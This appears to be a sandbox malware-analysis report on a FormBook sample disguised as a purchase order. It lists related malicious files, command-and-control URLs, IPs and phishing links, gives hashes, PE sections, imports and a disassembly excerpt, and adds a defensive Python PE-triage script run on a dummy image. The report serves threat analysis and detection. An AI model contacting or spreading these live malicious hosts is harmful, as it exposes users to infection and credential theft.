                                    09090.exe | malicious | FormBook | www.autoreediritto.com/aucq/?zFQHE=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&yF3=b0i4Y00xHtf
                                    8bwKawHg0Z.exe | malicious | FormBook | www.autoreediritto.com/aucq/?m4kp=Q04lO4tHCdMhGRPp&Z2n4kTEh=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqUenkRjtIRRn+PcJ+980YglFIHv1RxaMTu2bilHhQR8NY0g==
                                    98790ytt.exe | malicious | FormBook | www.autoreediritto.com/aucq/?GHo=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&i2=tZJdhrYHabWX4H
                                    aertrh.exe | malicious | FormBook | www.autoreediritto.com/aucq/?bbtD=v8Pp0x&mXnt=KoQMLvtx3M4SfAq91ckdEaeNevOygAbB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqWc3KGV5GAX2rZsRT+8QcgDF4B+0ExfJRqG4=
                                    RB_VAC_1.EXE.exe | malicious | DBatLoader, FormBook | www.stnlab.net/twn7/
                                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                Match: natroredirect.natrocdn.com
                                    AWB_5771388044 Documenti di spedizione.exe | malicious | FormBook | 85.159.66.93
                                    Cotizaci#U00f3n.exe | malicious | FormBook | 85.159.66.93
                                    PO2024033194.exe | malicious | FormBook | 85.159.66.93
                                    FvYlbhvZrZ.rtf | malicious | FormBook | 85.159.66.93
                                    SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsx | malicious | FormBook | 85.159.66.93
                                    file.exe | malicious | FormBook | 85.159.66.93
                                    file.exe | malicious | FormBook | 85.159.66.93
                                    Quote 05-302.lnk | malicious | FormBook | 85.159.66.93
                                    LgzpILNkS2.exe | malicious | FormBook | 85.159.66.93
                                    ncOLm62YLB.exe | malicious | FormBook | 85.159.66.93
                                Match: www.rtpngk.xyz
                                    PO2024033194.exe | malicious | FormBook | 188.114.96.3
                                    DOC092024-0431202229487.exe | malicious | FormBook | 188.114.97.3
                                Match: cluster580fc23f.abcty2.com
                                    DCP11-83642024..exe | malicious | FormBook | 154.198.53.36
                                    file.exe | malicious | FormBook | 185.121.169.26
                                    https://9bet999.com/ | malicious | Unknown | 154.198.53.36
                                    http://9bet938.com/ | malicious | Unknown | 154.198.53.36
                                    https://1b375bcda594bd6f.bet898.vip/ | malicious | Unknown | 154.198.53.47
                                    http://58365888.cc/ | malicious | Unknown | 45.194.36.61
                                    https://bet958v.com/ | malicious | Unknown | 27.0.235.55
                                    https://bet958z.com/ | malicious | Unknown | 154.198.53.36
                                    https://bet958d.com/ | malicious | Unknown | 81.31.208.67
                                    https://7365bb.vip/ | malicious | Unknown | 185.121.169.26
                                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                Match: COGENT-174 US
                                    http://xb2.aggressiveq9.com/21u/ | malicious | HTMLPhisher | 143.244.208.184
                                    q8HkBndUpP.exe | malicious | Unknown | 38.175.45.11
                                    yoYRK88Xg2.exe | malicious | Unknown | 38.175.45.20
                                    jade.arm.elf | malicious | Mirai | 206.0.212.64
                                    jade.ppc.elf | malicious | Mirai | 149.40.99.56
                                    AWB_5771388044 Documenti di spedizione.exe | malicious | FormBook | 206.119.82.147
                                    ES-241-29335_pdf.exe | malicious | FormBook | 38.181.21.65
                                    PO2024033194.exe | malicious | FormBook | 154.23.184.240
                                    PO #86637.exe | malicious | FormBook | 154.23.184.240
                                    RECIEPT.PDF.exe | malicious | FormBook | 206.119.82.172
                                Match: NAMECHEAP-NET US
                                    PO-001.exe | malicious | FormBook | 162.0.239.141
                                    Cotizaci#U00f3n.exe | malicious | FormBook | 63.250.47.40
                                    ES-241-29335_pdf.exe | malicious | FormBook | 63.250.47.40
                                    Request for Quotation Hi-Tech Park Project 193200.exe | malicious | FormBook | 199.192.21.169
                                    LOL and profile.exe | malicious | FormBook | 162.0.236.169
                                    RECIEPT.PDF.exe | malicious | FormBook | 162.0.238.246
                                    PO# Q919240.exe | malicious | FormBook | 63.250.47.40
                                    ADNOC REQUESTS & reviews.exe | malicious | FormBook | 162.0.236.169
                                    https://suspokertellscractor-f7a93a.ingress-florina.ewp.live/wp-content/plugins/unsemitions/infospage.php | malicious | Unknown | 63.250.43.136
                                    http://siddiquimehvish07.github.io/neflixclone.github.io | malicious | HTMLPhisher | 162.0.235.241
                                Match: OVH FR
                                    http://xb2.aggressiveq9.com/21u/ | malicious | HTMLPhisher | 54.38.113.2
                                    https://secure.rpcthai.com/ | malicious | Unknown | 5.196.111.73
                                    ounU0OuZvF.rtf | malicious | Unknown | 91.134.98.142
                                    http://scandalous-big-open.glitch.me/auto.html | malicious | Unknown | 46.105.222.82
                                    8zzBr1gT31.elf | malicious | Mirai | 5.196.148.136
                                    iZP1hJhnmz.elf | malicious | Mirai | 5.196.148.130
                                    RFQ_PO_KMM7983972_ORDER_DETAILS.js | malicious | AgentTesla, RedLine | 51.195.88.199
                                    https://onlyclips.site/?title=quinnfinite&ref=git | malicious | Unknown | 149.56.240.27
                                    ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmd | malicious | AgentTesla, DBatLoader | 51.195.88.199
                                    https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/s%2Ffactorhumano.eu/.dev/75603jiAG/UkZyZWVzbGFuZEBidXJiYW5rY2EuZ292 | malicious | Unknown | 178.33.162.219
                                No context
                                No context
                                Process:C:\Windows\SysWOW64\grpconv.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                Category:modified
                                Size (bytes):196608
                                Entropy (8bit):1.1215420383712111
                                Encrypted:false
                                SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe
                                File Type:data
                                Category:modified
                                Size (bytes):287232
                                Entropy (8bit):7.994664134270278
                                Encrypted:true
                                SSDEEP:6144:v1ORRLrFIIoyyYdykYbkrtuJsYIS0JYFOmiDHFmNf2EqkAR63YnaZz:vwRL+I4AykkJsYISF9iDHoV2Eqk86YnQ
                                MD5:F247A71D68BD8493200D7D622C78C60D
                                SHA1:188F6994B782EB8D5C65F54C18EF78EDF8107AF0
                                SHA-256:FF8DF61B2AC0DF2BE827A48AEC171E150F68727B0301C5EDF7557DF5E662B2CC
                                SHA-512:F0321A64B1770BFDE4D3528626EAB6BF62A2F197BD3DB8FFBC74DD6D8EC34E421BF6F55C373AE7B65278A0AA44EEC38A0CD2A755C47AFD9D4FBFCAD427AE0AD1
                                Malicious:false
                                Reputation:low
                                Preview:...b.XXHSm.[....o.7[..l7Z...TTA0CXXHS5PXR6SG4S37XYASD4RUXY.TA0MG.FS.Y.s.R..rg_1*a#6[5'94t7 ^-7,h1Pp*'Xs.Zswx.y,< Q|XUSpTA0CXXH*4Y.oV4..3T.e9&.^...b93.[..d(4.J...o'S.a^;1|3#.RUXYTTA0..XH.4QX.5X.4S37XYAS.4PTSX_TA`GXXHS5PXR6cR4S3'XYA3@4RU.YTDA0CZXHU5PXR6SG2S37XYASDTVUX[TTA0CXZH..PXB6SW4S37HYACD4RUXYDTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PX|B6?@S37..ESD$RUX.PTA CXXHS5PXR6SG4S.7X9ASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.360995698697927
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:Purchase Order_ AEPL-2324-1126.exe
                                File size:1'509'575 bytes
                                MD5:4d40b6f064db9c79d427ca2a2c9b87ae
                                SHA1:aeed2a31d23e0615c1f8ecc2f10c9ad285666b2d
                                SHA256:8b117326a85883033f16c21e24a6e07bcc1cb7cced62623a95c1649e7b727688
                                SHA512:39f15396eab2d4819a92af72c8a8cb1323a1b9418663b8a6f5a3bf0e6dc04ef213fb4c1eb5252df2b70bfa2c9710c43c669eaa0860c1af21b0b7c89f9473c150
                                SSDEEP:24576:vRmJkcoQricOIQxiZY1WNE8JLF0r7ICh7KHtYguK+wBWmzoYvt:kJZoQrbTFZY1WNEIpJmSYfK+w5zX
                                TLSH:A765F121B5D5906EC1B32FB08E7EF3659738793A0226D64B3FC9293D4DF11412A2E726
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                Icon Hash:7f4746c7c7730f06
                                Entrypoint:0x4165c1
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:0
                                File Version Major:5
                                File Version Minor:0
                                Subsystem Version Major:5
                                Subsystem Version Minor:0
                                Import Hash:369fe35b86c83b3130c02698158a4d4d
                                Instruction
                                call 00007F3150CDBFDBh
                                jmp 00007F3150CD2E4Eh
                                int3
                                int3
                                int3
                                int3
                                int3
                                push ebp
                                mov ebp, esp
                                push edi
                                push esi
                                mov esi, dword ptr [ebp+0Ch]
                                mov ecx, dword ptr [ebp+10h]
                                mov edi, dword ptr [ebp+08h]
                                mov eax, ecx
                                mov edx, ecx
                                add eax, esi
                                cmp edi, esi
                                jbe 00007F3150CD2FCAh
                                cmp edi, eax
                                jc 00007F3150CD3166h
                                cmp ecx, 00000080h
                                jc 00007F3150CD2FDEh
                                cmp dword ptr [004A9724h], 00000000h
                                je 00007F3150CD2FD5h
                                push edi
                                push esi
                                and edi, 0Fh
                                and esi, 0Fh
                                cmp edi, esi
                                pop esi
                                pop edi
                                jne 00007F3150CD2FC7h
                                jmp 00007F3150CD33A2h
                                test edi, 00000003h
                                jne 00007F3150CD2FD6h
                                shr ecx, 02h
                                and edx, 03h
                                cmp ecx, 08h
                                jc 00007F3150CD2FEBh
                                rep movsd
                                jmp dword ptr [00416740h+edx*4]
                                mov eax, edi
                                mov edx, 00000003h
                                sub ecx, 04h
                                jc 00007F3150CD2FCEh
                                and eax, 03h
                                add ecx, eax
                                jmp dword ptr [00416654h+eax*4]
                                jmp dword ptr [00416750h+ecx*4]
                                nop
                                jmp dword ptr [004166D4h+ecx*4]
                                nop
                                inc cx
                                add byte ptr [eax-4BFFBE9Ah], dl
                                inc cx
                                add byte ptr [ebx], ah
                                ror dword ptr [edx-75F877FAh], 1
                                inc esi
                                add dword ptr [eax+468A0147h], ecx
                                add al, cl
                                jmp 00007F315314B7C7h
                                add esi, 03h
                                add edi, 03h
                                cmp ecx, 08h
                                jc 00007F3150CD2F8Eh
                                rep movsd
                                jmp dword ptr [00000000h+edx*4]
                                Programming Language:
                                • [ C ] VS2010 SP1 build 40219
                                • [C++] VS2010 SP1 build 40219
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [ASM] VS2010 SP1 build 40219
                                • [RES] VS2010 SP1 build 40219
                                • [LNK] VS2010 SP1 build 40219
                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x34430 | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata | 0x82000 | 0xdfc0 | 0xe000 | f0991b788ac34ea4b210673093655317 | False | 0.3256312779017857 | data | 4.484090180677536 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc | 0xab000 | 0x34430 | 0x34600 | a82206669afc4deee240736fd6f51cdb | False | 0.42391203013126494 | data | 5.503762238230974 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
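The section table above is the first place a reviewer looks for packing: per-section entropy, the writable/executable bits, and the gap between raw and virtual size. The following Python is an added example (not code from the Joe Sandbox report) that walks the DOS header, COFF header and section table of a PE image and applies exactly those three checks, and also decodes the COFF TimeDateStamp the report shows as 0x4F25BAEC. The input is a constructed, minimal PE image built inline (a low-entropy ".text" and a pseudo-random, writable-and-executable ".xpack"); it is not this sample and is not loadable. The 7.0 entropy threshold is an analyst rule of thumb, not a specification value.

```python
import datetime
import math
import random
import struct

# Section characteristics bits from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Rule-of-thumb threshold (assumption, not a spec value): normally compiled code and
# data sit well below it; compressed or encrypted payloads approach 8.0.
HIGH_ENTROPY = 7.0


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0..8.0), the same measure as the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def _coff_header_offset(pe: bytes) -> int:
    """Follow e_lfanew from the DOS header to the COFF file header, checking both signatures."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    return e_lfanew + 4


def coff_timestamp(pe: bytes) -> str:
    """TimeDateStamp from the COFF header as UTC. The linker writes it, so treat it as a claim, not a fact."""
    coff = _coff_header_offset(pe)
    ts = struct.unpack_from("<I", pe, coff + 4)[0]
    return datetime.datetime.fromtimestamp(ts, datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def parse_sections(pe: bytes) -> list:
    """Return one dict per section header, with the entropy of the section's raw bytes."""
    coff = _coff_header_offset(pe)
    _, nsec, _, _, _, size_opt, _ = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + size_opt            # section table follows the optional header
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from("<8sIIIIIIHHI", pe, table + 40 * i)
        raw = pe[rawptr:rawptr + rawsize]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va, "virtual_size": vsize, "raw_size": rawsize,
            "characteristics": flags, "entropy": shannon_entropy(raw),
        })
    return sections


def triage(pe: bytes) -> list:
    """Flag the section-level signs an analyst checks first; returns (section name, reason) pairs."""
    findings = []
    for s in parse_sections(pe):
        f = s["characteristics"]
        if s["entropy"] >= HIGH_ENTROPY:
            findings.append((s["name"], "entropy %.2f: packed or encrypted payload" % s["entropy"]))
        if f & IMAGE_SCN_MEM_WRITE and f & IMAGE_SCN_MEM_EXECUTE:
            findings.append((s["name"], "writable and executable: self-modifying code or in-place unpacking"))
        if s["raw_size"] == 0 and s["virtual_size"] > 0:
            findings.append((s["name"], "no raw data but nonzero virtual size: filled at runtime"))
    return findings


def build_sample_pe() -> bytes:
    """Constructed, minimal PE image for this demo (DOS stub, COFF header, two sections). Not a loadable
    program: SizeOfOptionalHeader is 0, which the parser tolerates; real files carry a full optional header."""
    rng = random.Random(7)
    text_raw = bytes([0x55, 0x8B, 0xEC, 0x90, 0xC3] * 200)          # repetitive stand-in for compiled code
    packed_raw = bytes(rng.getrandbits(8) for _ in range(4096))      # pseudo-random stand-in for an encrypted blob
    sections = [
        (b".text", 0x1000, text_raw, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (b".xpack", 0x2000, packed_raw,
         IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    ]
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                          # e_lfanew -> PE signature at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0x4F25BAEC, 0, 0, 0, 0x0102)  # i386; timestamp from the report
    header_size = 0x200                                              # one file-alignment unit holds these headers
    table, body, ptr = b"", b"", header_size
    for name, va, raw, flags in sections:
        table += struct.pack("<8sIIIIIIHHI", name, len(raw), va, len(raw), ptr, 0, 0, 0, 0, flags)
        body += raw
        ptr += len(raw)
    image = bytes(dos) + b"PE\0\0" + coff + table
    return image + b"\0" * (header_size - len(image)) + body


if __name__ == "__main__":
    sample = build_sample_pe()
    print("TimeDateStamp:", coff_timestamp(sample))
    for s in parse_sections(sample):
        print("%-8s va=0x%05x raw=0x%05x entropy=%.2f" % (s["name"], s["virtual_address"], s["raw_size"], s["entropy"]))
    for name, reason in triage(sample):
        print("FLAG", name, reason)
```

Against the table above none of the three checks fires: .text at 6.68 bits is ordinary compiled code, no section is both writable and executable, and .data's virtual size exceeding its raw size is the usual zero-initialised tail. That is consistent with the high-entropy (7.99) 287 KB blob being written at run time rather than shipped as a packed section, which is why the dropped-file entry above, not the section table, is where the payload shows up.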
                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                                RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                                RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                RT_ICON | 0xab940 | 0x9b30 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9974828836085381
                                RT_ICON | 0xb5470 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | Great Britain | 0.23448775582633385
                                RT_ICON | 0xc5c98 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | Great Britain | 0.3154036157241959
                                RT_ICON | 0xcf140 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | Great Britain | 0.3422365988909427
                                RT_ICON | 0xd45c8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | Great Britain | 0.3288852149267832
                                RT_ICON | 0xd87f0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.4078838174273859
                                RT_ICON | 0xdad98 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.4545028142589118
                                RT_ICON | 0xdbe40 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | Great Britain | 0.5471311475409836
                                RT_ICON | 0xdc7c8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.6542553191489362
                                RT_MENU | 0xdcc30 | 0x50 | data | English | Great Britain | 0.9
                                RT_DIALOG | 0xdcc80 | 0xfc | data | English | Great Britain | 0.6507936507936508
                                RT_STRING | 0xdcd80 | 0x530 | data | English | Great Britain | 0.33960843373493976
                                RT_STRING | 0xdd2b0 | 0x690 | data | English | Great Britain | 0.26964285714285713
                                RT_STRING | 0xdd940 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
                                RT_STRING | 0xdde10 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                RT_STRING | 0xde410 | 0x65c | data | English | Great Britain | 0.34336609336609336
                                RT_STRING | 0xdea70 | 0x388 | data | English | Great Britain | 0.377212389380531
                                RT_STRING | 0xdedf8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
                                RT_GROUP_ICON | 0xdef50 | 0x84 | data | English | Great Britain | 0.7348484848484849
                                RT_GROUP_ICON | 0xdefd8 | 0x14 | data | English | Great Britain | 1.15
                                RT_GROUP_ICON | 0xdeff0 | 0x14 | data | English | Great Britain | 1.25
                                RT_GROUP_ICON | 0xdf008 | 0x14 | data | English | Great Britain | 1.25
                                RT_VERSION | 0xdf020 | 0x19c | data | English | Great Britain | 0.5339805825242718
                                RT_MANIFEST | 0xdf1c0 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
                                DLL | Imports
                                KERNEL32.DLL | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
                                GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
